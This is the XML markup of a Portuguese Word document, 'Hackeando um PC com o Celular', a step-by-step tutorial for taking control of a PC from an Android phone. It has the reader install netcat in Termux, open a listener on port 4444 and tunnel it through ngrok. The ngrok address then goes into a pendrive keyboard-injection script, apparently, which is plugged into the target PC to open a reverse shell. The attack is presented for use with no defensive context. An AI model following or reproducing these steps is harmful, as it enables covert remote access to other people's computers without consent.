    <w:p w14:paraId="2F09998B" w14:textId="1E543BEB" w:rsidR="002B18F0" w:rsidRDefault="002B18F0"/>
    <w:p w14:paraId="208B78B8" w14:textId="21A2F639" w:rsidR="002B18F0" w:rsidRDefault="002B18F0"/>
    <w:p w14:paraId="03CCB836" w14:textId="5FC39860" w:rsidR="002B18F0" w:rsidRDefault="002B18F0"/>
    <w:p w14:paraId="6DB993E2" w14:textId="036B2C5B" w:rsidR="002B18F0" w:rsidRDefault="002B18F0"/>
    <w:p w14:paraId="41915E39" w14:textId="00D88F45" w:rsidR="002B18F0" w:rsidRDefault="002B18F0"/>
    <w:p w14:paraId="0EFD0663" w14:textId="1BEABFE9" w:rsidR="002B18F0" w:rsidRDefault="002B18F0"/>
    <w:p w14:paraId="17D1189D" w14:textId="4BA9FB64" w:rsidR="002B18F0" w:rsidRDefault="002B18F0"/>
    <w:p w14:paraId="531DFDF0" w14:textId="40A3B0D0" w:rsidR="002B18F0" w:rsidRDefault="002B18F0"/>
    <w:p w14:paraId="62C2E01F" w14:textId="691CE6D1" w:rsidR="002B18F0" w:rsidRDefault="002B18F0"/>
    <w:p w14:paraId="14CFCCCD" w14:textId="02F08508" w:rsidR="002B18F0" w:rsidRDefault="002B18F0"/>
    <w:p w14:paraId="602C2BFE" w14:textId="19A08FF0" w:rsidR="002B18F0" w:rsidRDefault="002B18F0"/>
    <w:p w14:paraId="3FBE9A71" w14:textId="0E37B9FE" w:rsidR="002B18F0" w:rsidRDefault="002B18F0"/>
    <w:p w14:paraId="0AE7100E" w14:textId="5D5FA733" w:rsidR="002B18F0" w:rsidRDefault="002B18F0"/>
    <w:p w14:paraId="399E3F9F" w14:textId="06FB866A" w:rsidR="002B18F0" w:rsidRDefault="002B18F0"/>
    <w:p w14:paraId="7A604734" w14:textId="5A9886A8" w:rsidR="002B18F0" w:rsidRDefault="002B18F0"/>
    <w:p w14:paraId="2872C31C" w14:textId="55B3C81C" w:rsidR="002B18F0" w:rsidRDefault="002B18F0"/>
    <w:p w14:paraId="6D10CA30" w14:textId="3829827B" w:rsidR="002B18F0" w:rsidRDefault="002B18F0"/>
    <w:p w14:paraId="2B7F8A04" w14:textId="56DE936B" w:rsidR="002B18F0" w:rsidRDefault="002B18F0"/>
    <w:p w14:paraId="33CA5327" w14:textId="73E4CC7E" w:rsidR="002B18F0" w:rsidRDefault="002B18F0"/>
    <w:p w14:paraId="2B85E8FF" w14:textId="4B4855C7" w:rsidR="002B18F0" w:rsidRDefault="002B18F0"/>
    <w:p w14:paraId="14B37045" w14:textId="77777777" w:rsidR="002B18F0" w:rsidRDefault="002B18F0" w:rsidP="002B18F0">
      <w:pPr>
        <w:pStyle w:val="Ttulo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121212"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="121212"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Hackeando um PC com o Celular</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310F96A6" w14:textId="77777777" w:rsidR="002B18F0" w:rsidRDefault="002B18F0"/>
    <w:p w14:paraId="23A134EB" w14:textId="510D62DF" w:rsidR="00652E34" w:rsidRDefault="00A21056">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1 – Abre o terminal </w:t>
      </w:r>
      <w:r w:rsidRPr="00A21056">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Termux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A21056">
        <w:t>(android)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> e digita </w:t>
      </w:r>
      <w:r w:rsidRPr="00A21056">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>apt update &amp;&amp; apt upgrade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0996F69B" w14:textId="4932310B" w:rsidR="00A21056" w:rsidRDefault="00A21056">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D93EF40" wp14:editId="0F4E4823">
            <wp:extent cx="3629025" cy="21621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408" w14:textId="1EC98AB5" w:rsidR="00A21056" w:rsidRDefault="00A21056">
      <w:r>
        <w:t xml:space="preserve">2 – Para instalar o netcat é só dar esse comando aqui </w:t>
      </w:r>
      <w:r w:rsidRPr="00A21056">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>apt install netcat-openbsd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DAFFF2" w14:textId="0EEF98FE" w:rsidR="00A21056" w:rsidRDefault="00A21056">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D10239E" wp14:editId="1F335278">
            <wp:extent cx="3143250" cy="2019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21F" w14:textId="40F22359" w:rsidR="00A21056" w:rsidRDefault="00A21056">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3 – Agora é só digitar o comando pra ouvir </w:t>
      </w:r>
      <w:r w:rsidRPr="00A21056">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>nc -vlp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2442E560" w14:textId="666F4672" w:rsidR="00A21056" w:rsidRDefault="00D115AD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16D9F312" wp14:editId="424EA479">
            <wp:extent cx="2447925" cy="158115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BF9" w14:textId="70D78403" w:rsidR="0031790B" w:rsidRDefault="0031790B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>4 – Agora só instalar o Ngrok no</w:t>
      </w:r>
      <w:r w:rsidRPr="0031790B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> termux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F054B6" w14:textId="34CCB090" w:rsidR="0031790B" w:rsidRDefault="0031790B">
      <w:hyperlink r:id="rId68" w:history="1">
        <w:r w:rsidRPr="007C57ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/Marcel0Sousa/termux-ngrok</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4950B002" w14:textId="77777777" w:rsidR="0031790B" w:rsidRDefault="0031790B"/>
    <w:p w14:paraId="47DC695B" w14:textId="1FEAD029" w:rsidR="0031790B" w:rsidRDefault="0031790B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4466FB95" wp14:editId="7D7AF35F">
            <wp:extent cx="5400040" cy="360870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6BAC" w14:textId="63A9AAFB" w:rsidR="0031790B" w:rsidRDefault="0031790B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C39A394" wp14:editId="4A4567BD">
            <wp:extent cx="3124200" cy="30670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398B" w14:textId="58007610" w:rsidR="0031790B" w:rsidRDefault="0031790B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5 – digita </w:t>
      </w:r>
      <w:r w:rsidRPr="0031790B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ngrok tcp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BE249F" w14:textId="69AA83BB" w:rsidR="0031790B" w:rsidRDefault="0031790B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19A70F10" wp14:editId="2BABAC5B">
            <wp:extent cx="5400040" cy="2735580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38B" w14:textId="6B7072B1" w:rsidR="009C6FD3" w:rsidRDefault="009C6FD3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">6 – </w:t>
      </w:r>
      <w:r w:rsidR="00052C73">
        <w:t>Mas antes precisa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> se logar digira </w:t>
      </w:r>
      <w:r w:rsidRPr="009C6FD3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ngrok athtoken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2623A683" w14:textId="00B15D86" w:rsidR="009C6FD3" w:rsidRDefault="009C6FD3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D6AC1BB" wp14:editId="7396F13B">
            <wp:extent cx="2781300" cy="362902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F2D" w14:textId="6EB9F735" w:rsidR="009C6FD3" w:rsidRDefault="009C6FD3">
      <w:r>
        <w:t>7 – Após isso entra na sua conta e copia o link de autenticação sem .\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E46A6A" w14:textId="53ECE975" w:rsidR="009C6FD3" w:rsidRDefault="009C6FD3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2FD5086D" wp14:editId="3A10EFFA">
            <wp:extent cx="5400040" cy="30454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2C4" w14:textId="5D7B5915" w:rsidR="00052C73" w:rsidRDefault="00052C73">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37DB7CFA" wp14:editId="7A565803">
            <wp:extent cx="4933950" cy="304800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6D58" w14:textId="611B4EAA" w:rsidR="00052C73" w:rsidRDefault="00052C73">
      <w:r>
        <w:t>Agora arrasta pro lado pra criar outra seção</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA5C7F1" w14:textId="790FBD99" w:rsidR="00052C73" w:rsidRDefault="00052C73">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21D7E5AA" wp14:editId="72927E9A">
            <wp:extent cx="3762375" cy="3076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86E6" w14:textId="6272ED4C" w:rsidR="00052C73" w:rsidRDefault="00052C73">
      <w:r>
        <w:t xml:space="preserve">8 – Digita </w:t>
      </w:r>
      <w:r w:rsidRPr="00052C73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ls </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">pra listar e </w:t>
      </w:r>
      <w:r w:rsidRPr="00052C73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lc -lvp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E066F06" w14:textId="490207D8" w:rsidR="00052C73" w:rsidRDefault="00052C73">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46D10F9F" wp14:editId="5D510EC4">
            <wp:extent cx="3590925" cy="27146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285" w14:textId="40C90874" w:rsidR="00361A65" w:rsidRDefault="00361A65">
      <w:r>
        <w:t>9 – Agora arrasta pro lado na seção 1 pega o IP que a gente quer se conectar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B563296" w14:textId="7FFC7807" w:rsidR="00361A65" w:rsidRDefault="00361A65">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CFD8370" wp14:editId="44A81A0F">
            <wp:extent cx="3981450" cy="345757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8CB" w14:textId="2BD03C58" w:rsidR="00361A65" w:rsidRDefault="00361A65">
      <w:r>
        <w:t>10 – Agora faremos a alteração no código colocando o link do ngrok</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536CA689" w14:textId="2B5A20EC" w:rsidR="00361A65" w:rsidRDefault="00361A65">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38F29B12" wp14:editId="476C3D1A">
            <wp:extent cx="5400040" cy="2851785"/>
            <wp:effectExtent l="0" t="0" r="0" b="571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B794" w14:textId="3F71DB1D" w:rsidR="000F6AAD" w:rsidRPr="0056248D" w:rsidRDefault="000F6AAD">
      <w:r>
        <w:t>Em seguida é só plugar o pendrive no PC e deixar a magica acontecer</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="000F6AAD" w:rsidRPr="005624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D3730"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CFF2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DBF"/>
    <w:rsid w:val="00047963"/>
    <w:rsid w:val="00052C73"/>
    <w:rsid w:val="000968D1"/>
    <w:rsid w:val="000B334C"/>
    <w:rsid w:val="000F6AAD"/>
    <w:rsid w:val="00104D64"/>
    <w:rsid w:val="00113AA9"/>
    <w:rsid w:val="001160FB"/>
    <w:rsid w:val="00172979"/>
    <w:rsid w:val="002B18F0"/>
    <w:rsid w:val="002C75F4"/>
    <w:rsid w:val="00306957"/>
    <w:rsid w:val="0031790B"/>
    <w:rsid w:val="00326C08"/>
    <w:rsid w:val="00335D60"/>
    <w:rsid w:val="0035464F"/>
    <w:rsid w:val="003566D2"/>
    <w:rsid w:val="00361A65"/>
    <w:rsid w:val="003A0ECE"/>
    <w:rsid w:val="003F14E8"/>
    <w:rsid w:val="0044600D"/>
    <w:rsid w:val="005175B2"/>
    <w:rsid w:val="00552747"/>
    <w:rsid w:val="00554D58"/>
    <w:rsid w:val="0056248D"/>
    <w:rsid w:val="005B0523"/>
    <w:rsid w:val="005B522F"/>
    <w:rsid w:val="00610AC5"/>
    <w:rsid w:val="0062017F"/>
    <w:rsid w:val="00652E34"/>
    <w:rsid w:val="00662B61"/>
    <w:rsid w:val="006B15AC"/>
    <w:rsid w:val="00714D8E"/>
    <w:rsid w:val="007A4ACA"/>
    <w:rsid w:val="007F1D6D"/>
    <w:rsid w:val="00845419"/>
    <w:rsid w:val="008B6D88"/>
    <w:rsid w:val="00975088"/>
    <w:rsid w:val="009C6FD3"/>
    <w:rsid w:val="009D59FF"/>
    <w:rsid w:val="00A21056"/>
    <w:rsid w:val="00A60547"/>
    <w:rsid w:val="00A75BCA"/>
    <w:rsid w:val="00AF4DB7"/>
    <w:rsid w:val="00B07F8D"/>
    <w:rsid w:val="00B22A6C"/>
    <w:rsid w:val="00B73A8E"/>
    <w:rsid w:val="00C60C2E"/>
    <w:rsid w:val="00CB2747"/>
    <w:rsid w:val="00D007B5"/>
    <w:rsid w:val="00D115AD"/>
    <w:rsid w:val="00D3135E"/>
    <w:rsid w:val="00D359B7"/>
    <w:rsid w:val="00DB3F5A"/>
    <w:rsid w:val="00E12764"/>
    <w:rsid w:val="00E3368E"/>
    <w:rsid w:val="00E402F3"/>
    <w:rsid w:val="00F4301D"/>
    <w:rsid w:val="00F62847"/>
    <w:rsid w:val="00F63DBF"/>
    <w:rsid w:val="00F71F13"/>
    <w:rsid w:val="00F96E4D"/>
    <w:rsid w:val="00FC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1DCFE"/>
  <w15:docId w15:val="{EC997D79-9379-4ED8-9470-FE9156198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1160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7508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5088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06957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1160FB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hyperlink" Target="https://gist.github.com/" TargetMode="External"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Marcel0Sousa/termux-ngrok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eternallybored.org/misc/netcat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hyperlink" Target="https://www.arduino.cc/en/software" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/Al0nnso/PendriveHacker-Scripts/main/DigiKeyboardPtBr.h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hspcx.blogspot.com/2020/05/instalando-ngrok-no-termux-tutorial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30</Pages>
  <Words>1071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Higo Viana Alves</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Francisco Higo Viana Alves</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-01-22T17:14:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-02-06T01:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>